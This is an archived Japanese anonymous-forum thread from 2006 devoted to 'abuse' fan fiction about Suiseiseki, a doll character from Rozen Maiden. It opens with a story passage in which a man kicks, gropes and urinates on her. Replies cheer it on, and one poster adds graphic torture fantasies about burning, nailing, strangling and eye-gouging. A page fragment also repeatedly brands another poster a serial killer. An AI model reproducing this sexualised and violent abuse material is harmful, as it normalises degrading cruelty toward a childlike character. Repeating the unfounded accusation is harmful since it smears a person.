「お願いですぅ・・・もうやめてくださいですぅ・・・」
「おうおう、さっきまでの威勢はどうしたんだぁ?弱音吐くなんてらしくないぜ?」
そう言ってデュードは翠星石の体を縛り付けてあるロープを切り、床に落ちた翠星石の腹部あたりに思いっきり蹴りを入れた。
何度も何度も蹴りを入れる。
「あぁぁあぁ・・・お腹が痛いですぅ・・・」
「さて、そろそろ開放してやるよ」
言葉通り、デュードは革ベルトをすべて解き、簡易拘束衣と化していた寝袋から翠星石を取り出した。
彼女は肉体的も精神的にも痛めつけられぐったりしている。
「にしても誰だあ?こんなもの送りつけやがった馬鹿は。新聞屋じゃないとすると検討がつかねえ」
デュードは翠星石の体をいろいろと触りまわした。
「ったく、こんなんじゃ抜けねえよ。どうせならブロンドベイブにしろってんだ」
翠星石は既に抜け殻のようだった。俯いたまま黙り込んでいる。
と、目の前にズボンとパンツが降りてきた。
見上げるとデュードが自分のモノを晒して今にも放尿しそうな体勢を取っていた。
「きゃあ!な、な、な、なにしてるんですぁ!恥ずかしいもの見せるなですぅ!」
真っ赤になった顔を手で覆う翠星石。そこへ頭から尿が降りかかる。
「きゃあああ!汚いですぅ!臭いですぅ!は、吐くかも・・・」
「元気になったじゃねえか。いい肥やしになるぜ〜へっへっへ」
そう言うとデュードは電気を消し、狭い部屋を出て行った。
「そうそう。逃げようとなんて考えるなよ。それは俺を怒らせるだけの意味のない行為だ」
デュードはドア越しにそう告げると、その場を去った。
絶望の淵に立たされる翠星石。彼女はこの後さらに酷い陵辱を受けるなどとは知る由もなかった。

To Be Continued

是非感想を聞かせてくれ
次回への励みになるからよ

844 :名無しかわいいよ名無し:2006/03/16(木) 00:19:35 ID:Up5K5reL
ううう……ひどいですぅ
翠星石は本当のことを言っただけですぅ
>>838-839は本当のことを認めたくないから翠星石をいじめるんですぅ
そうに決まってるですぅ!

845 :名無しかわいいよ名無し:2006/03/16(木) 00:20:09 ID:QF85WViH
デュードさん!スカっとして気持ちいいです。
時間があったら雛苺も虐待して下さい!
スレを立てましたので!

846 :デュード ◆rKKpoidTWY :2006/03/16(木) 00:23:46 ID:TGBrkypL
>>845
いいぜ
雛苺はあんまり特徴掴んでないが、単行本読み直せばすぐに描けるから期待して待ってな!

847 :名無しかわいいよ名無し:2006/03/16(木) 00:32:28 ID:Hg+xYvQi
>>843 激しくGJ!次回期待してまっせ!
更に禿げしく過激で汚物と恥辱に満ちた展開キヴォ

848 :名無しかわいいよ名無し:2006/03/16(木) 02:17:16 ID:lKknLgd6
                          ___    .∞ 〜
                        く/',二二ヽ>
                      ν⌒,,ζl |ノノイハ)) ボコられたですぅ・・・
                    ⊂_:#:≦|#:;)〜T#)

849 :名無しかわいいよ名無し:2006/03/16(木) 07:54:29 ID:E09wK/hE
デュードさん!雛苺の後は是非蒼星石も虐待してやってください!
よろしくお願いします。

850 :名無しかわいいよ名無し:2006/03/16(木) 08:45:11 ID:Vy8xqcdM
      ___  
     く/',二二ヽ> 
     |l |ノノイハ)) 
      |l |リ゚ ー゚ノl| 虐待は薔薇乙女の嗜みですぅ♪ 
     ノl_|(l_介」).|
    ≦ノ`ヽノヘ≧ 
.   ミく二二二〉ミ 




851 :名無しかわいいよ名無し:2006/03/16(木) 12:23:29 ID:5IKhj1Ap
デュードさん、今後もいい作品を書いてください。
お願いします。

852 :名無しかわいいよ名無し:2006/03/16(木) 12:37:30 ID:TymJP/3n
           ___   ♪
          く/',二二ヽ>
          |l |ノノイハ))  日頃世話になってるデュードに庭の水まきですぅ
      ((   |l |リ゚ ヮ゚ノl|
          ノl⊂l_介」つ0匚lア ミミ
         ≦ノ`ヽノヘ≧     ミミ
        ミく二二二〉ミ     ψ

853 :名無しかわいいよ名無し:2006/03/16(木) 12:54:58 ID:WmKrwHOr
キチガイ晒しage

854 :名無しかわいいよ名無し:2006/03/16(木) 14:08:40 ID:6vl3TLU6
輝かしいID:gePonnrl撃沈の記録


309 :名無しさん@お腹いっぱい。:2006/03/15(水) 21:56:12 ID:gePonnrl
誰だよ翠虐待スレにキチガイ呼んだのは。


310 :名無しさん@お腹いっぱい。:2006/03/15(水) 21:56:58 ID:bFTyzn55
虐待自体が(ry


311 :名無しさん@お腹いっぱい。:2006/03/15(水) 21:57:23 ID:zHTMHrpf
そんなスレあるんだ


312 :名無しさん@お腹いっぱい。:2006/03/15(水) 22:06:21 ID:/aFz5Vl/
>>309
虐待スレの奴らが気違いの間違いだろ?


313 :名無しさん@お腹いっぱい。:2006/03/15(水) 22:07:29 ID:b50dXP65
なんにせよスレ違いだよ。


314 :名無しさん@お腹いっぱい。:2006/03/15(水) 22:09:31 ID:VABMRazL
むしろ翠星石に虐待されたい(;´Д`)ハァハァ


315 :名無しさん@お腹いっぱい。:2006/03/15(水) 22:10:19 ID:8sQkOlge
あの胸糞悪いスレまだ残ってたのか・・・
マジであそこは人として最低な奴らの集まりじゃないか
さっさと削除して欲しいよ


316 :名無しさん@お腹いっぱい。:2006/03/15(水) 22:10:20 ID:UpPc9Taw
その考えなら俺も乗った!(;´Д`)ハァハァ


317 :名無しさん@お腹いっぱい。:2006/03/15(水) 22:10:49 ID:gePonnrl
>>312
いや、虐待は抜きして翠星石の個性を掴みウィットに富んだやりとりは読んでいて面白い。


855 :名無しかわいいよ名無し:2006/03/16(木) 14:10:25 ID:6vl3TLU6
319 :名無しさん@お腹いっぱい。:2006/03/15(水) 22:14:33 ID:8sQkOlge
>>317
読んだことあるけど極一部のものは許せないこともなかったが
あまりにむごい表現が多すぎたから俺はもう2度と開く気は無い
マジでいかれてるよ、あそこの連中。
320 :名無しさん@お腹いっぱい。:2006/03/15(水) 22:15:40 ID:OXjPRV1X
虐待スレはどこですか?
321 :名無しさん@お腹いっぱい。:2006/03/15(水) 22:16:25 ID:XJBqS5ge
とりあえず俺には漫画やアニメのキャラを虐待する面白さが分からない。
322 :名無しさん@お腹いっぱい。:2006/03/15(水) 22:18:16 ID:/aFz5Vl/
>>320
見ない方が良い。気分悪くなるから。

>>321
心底同意。


323 :名無しさん@お腹いっぱい。:2006/03/15(水) 22:22:29 ID:RoFxTiGC
wかるせさ潰てし頼依にPIV

325 :名無しさん@お腹いっぱい。:2006/03/15(水) 22:25:19 ID:b+8Vx/mQ
虐待スレは頭イカれてる連中しかいないよ。
特にデュードって人のは狂ってるとしか思えない。

327 :名無しさん@お腹いっぱい。:2006/03/15(水) 22:26:16 ID:bIUa5l5N
>>322
気分が悪くなるというか、胸糞悪くなるな。ああいうことする奴の存在を疑う



856 :名無しかわいいよ名無し:2006/03/16(木) 14:12:34 ID:6vl3TLU6
333 :名無しさん@お腹いっぱい。:2006/03/15(水) 22:31:17 ID:gePonnrl
虐待スレのあれは「愛するが故に」だと思うけどなあ。
接し方は人それぞれなんだし。
認めたくないのはわかるが・・・


334 :名無しさん@お腹いっぱい。:2006/03/15(水) 22:33:25 ID:bFTyzn55
普通の人なら暴力的なことを嫌うというのが分かってるんなら
このスレに話題を持ち込むのはやめような

335 :名無しさん@お腹いっぱい。:2006/03/15(水) 22:34:00 ID:RoFxTiGC
そんな歪んだ愛情など理解できんね俺には。

336 :名無しさん@お腹いっぱい。:2006/03/15(水) 22:34:02 ID:/aFz5Vl/
>>333
虐待は愛とは別物だよ。
虐待は一方的に自分の欲望を吐き出すだけの行為。
愛は相手が常に喜ぶことを考えること。
少なくとも俺は自分の愛する人にああいうことをしたいとは絶対思わないね。

340 :名無しさん@お腹いっぱい。:2006/03/15(水) 22:36:02 ID:b+8Vx/mQ
虐待というより虐殺にも思えるんだがあれは。


857 :名無しかわいいよ名無し:2006/03/16(木) 14:14:22 ID:vokOB0Gw
見なきゃいいだけなのにねえ
なんでこうもマゾが多いのかな

858 :名無しかわいいよ名無し:2006/03/16(木) 14:32:37 ID:TymJP/3n
 く/',二二ヽ>
  |l |ノノイハ))  
  |l |≧∀≦l| おめーら一緒に遊ぶですぅ!翠星石は空気を読まんですぅ!     
  ノl⊂l_介」つ 
. /ノ>、,.<ヽ\ 
. `<_/ |. ヽ_ン'  
    ∪∪
    ‖‖
   ε  З

859 :名無しかわいいよ名無し:2006/03/16(木) 14:47:41 ID:T8wnDsmM
じゃあ、おまえをサンドバッグにいsて遊ぶか。

860 :名無しかわいいよ名無し:2006/03/16(木) 14:59:34 ID:26wb7GHu
http://www.uploda.org/uporg337579.jpg.html
さすがふたば

861 :名無しかわいいよ名無し:2006/03/16(木) 15:16:42 ID:jS2+qGe6

. .: : : : : : : : :: :::: :: :: : :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
    . . : : : :: : : :: : ::: :: : :::: :: ::: ::: ::::::::::::::::::::::::::::::::::::::
   . . .... ..: : :: :: ::: :::::: :::::::::::: : :::::::::::::::::::::::::::::::::::::::::::::
        Λ_Λ . . . .: : : ::: : :: ::::::::: :::::::::::::::::::::::::::::
       /:彡ミ゛ヽ;)ー、 . . .: : : :::::: :::::::::::::::::::::::::::::::::
      / :::/:: ヽ、ヽ、 ::i . .:: :.: ::: . :::::::::::::::::::::::::::::::::::::::
      / :::/;;:   ヽ ヽ ::l . :. :. .:: : :: :: :::::::: : ::::::::::::::::::
 ̄ ̄ ̄(_,ノ  ̄ ̄ ̄ヽ、_ノ ̄ ̄ ̄ ̄

     小説書けねえ・・・

862 :名無しかわいいよ名無し:2006/03/16(木) 15:26:44 ID:TymJP/3n
>>859 ____           
 く/',二二ヽ>       
  l |ノノイハ))         
 |l |リ゚ー゚ノl| さぁ煮るなり焼くなり好きにするがいいですぅ!       
  Ξ Ξ Ξ!|         
 ≦Ξ Ξ Ξ≧      
ミく二二二〉ミ        





863 :名無しかわいいよ名無し:2006/03/16(木) 15:31:13 ID:26wb7GHu
>>862
よしじゃあ黒ヒゲ危機一髪ごっこをした後に高層ビルの屋上に連れて行ってガソリンぶっかけて、
頭に包丁ブッ刺してお前の意識がなくならないうちにライターで火をつけて突き落としてあげるね

864 :名無しかわいいよ名無し:2006/03/16(木) 15:35:36 ID:TymJP/3n
>>863____           
 く/',二二ヽ>       
  l |ノノイハ))         
 |l ≧∀≦ノl| 言葉の意味は全然わからんがとにかくすごい自信ですぅ       
  Ξ Ξ Ξ!|         
 ≦Ξ Ξ Ξ≧      
ミく二二二〉ミ        


865 :名無しかわいいよ名無し:2006/03/16(木) 15:40:05 ID:26wb7GHu
>>864
こんな簡単な言葉もわからないなんて、
本当に翠星石はかわいいクズだなあ
ご褒美にかわいいちっちゃなおててを地面に五寸釘で固定して、
その上に重いものをどんどん落としてあげるね

866 :名無しかわいいよ名無し:2006/03/16(木) 15:44:20 ID:ctU1CbeC
やっぱさ
ローゼンメイデンはネタないからこういうのに走るだけなんじゃないか?
アニメや原作はそこそこ面白いし、萌えるかもしれんが。
ただそれだけじゃない?(・・。
他の作品で虐待板あるなら教えてくれよ。
あとさ、このスレで虐待きもいとかいうけど
純愛話だろうが、なんであろうがきもいだろ?
所詮妄想なんだし反応しないでくれ。

867 :名無しかわいいよ名無し:2006/03/16(木) 15:45:04 ID:26wb7GHu
あげんなバカ

868 :名無しかわいいよ名無し:2006/03/16(木) 15:56:01 ID:TymJP/3n
>>865
   ___  
 く/',二二ヽ> 
 |l |ノノイハ)) 
 |l |リ゚ ー゚ノl| やっぱり翠星石は他のジャンク達とは格が違うのですぅね
  Ξ Ξ Ξ!|         
 ≦Ξ Ξ Ξ≧      
ミく二二二〉ミ

869 :名無しかわいいよ名無し:2006/03/16(木) 16:00:44 ID:26wb7GHu
>>868
そりゃもちろんさ!格が違いすぎるよ!
バカさとかムカつき度とかいろいろね!
愛してるよ翠星石
今すぐそのヘッドセットをそのかわいらしいさくらんぼのようなおくちにつめこんで、
そのさらさらのこの世のものとは思えないほど美しいウェーブのかかった髪を切って禿げ頭にして、
その髪でその華奢で少し掴んだらいとも簡単におれてしまいそうな愛らしい首を絞めてあげるからね

870 :名無しかわいいよ名無し:2006/03/16(木) 16:20:11 ID:TymJP/3n
  ___  
く/',二二ヽ> 
 |l |ノノイハ)) 
 |l |リ^ー゚ノl| やっぱり翠星石はチビ人間どもの人気者ですぅ!
  Ξ Ξ Ξ!|         
 ≦Ξ Ξ Ξ≧      
ミく二二二〉ミ

871 :名無しかわいいよ名無し:2006/03/16(木) 16:25:00 ID:26wb7GHu
そうだよぉ、だって翠星石とーってもかわいいし、いじめがいあるしね
よーし次はそのキラキラしてる生意気なくりくりおめめを片方くりぬいてみようか
くりぬいたおめめは晩御飯として出してあげるから安心してね
くりぬいたところがぽっかりあいてて間抜けだから山芋を流し込んで固めて瞬間接着剤つけてふたしてあげるね
ふたは翠星石の望む柄にしてあげるよ

501 KB
■ このスレッドは過去ログ倉庫に格納されています

>>150>>161 h&key=995096672&st=574&to=574&nofirst=true" target="_blank">>>574はむかついたら人を殺す連続通り魔のようです。
>>574はむかついたら人を殺す連続通り魔のようです。 >>574はむかついたら人を殺す連続通り魔のようです。
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50


read.cgi ver 05.04.09 2022/06/21 Walang Kapalit ★
FOX ★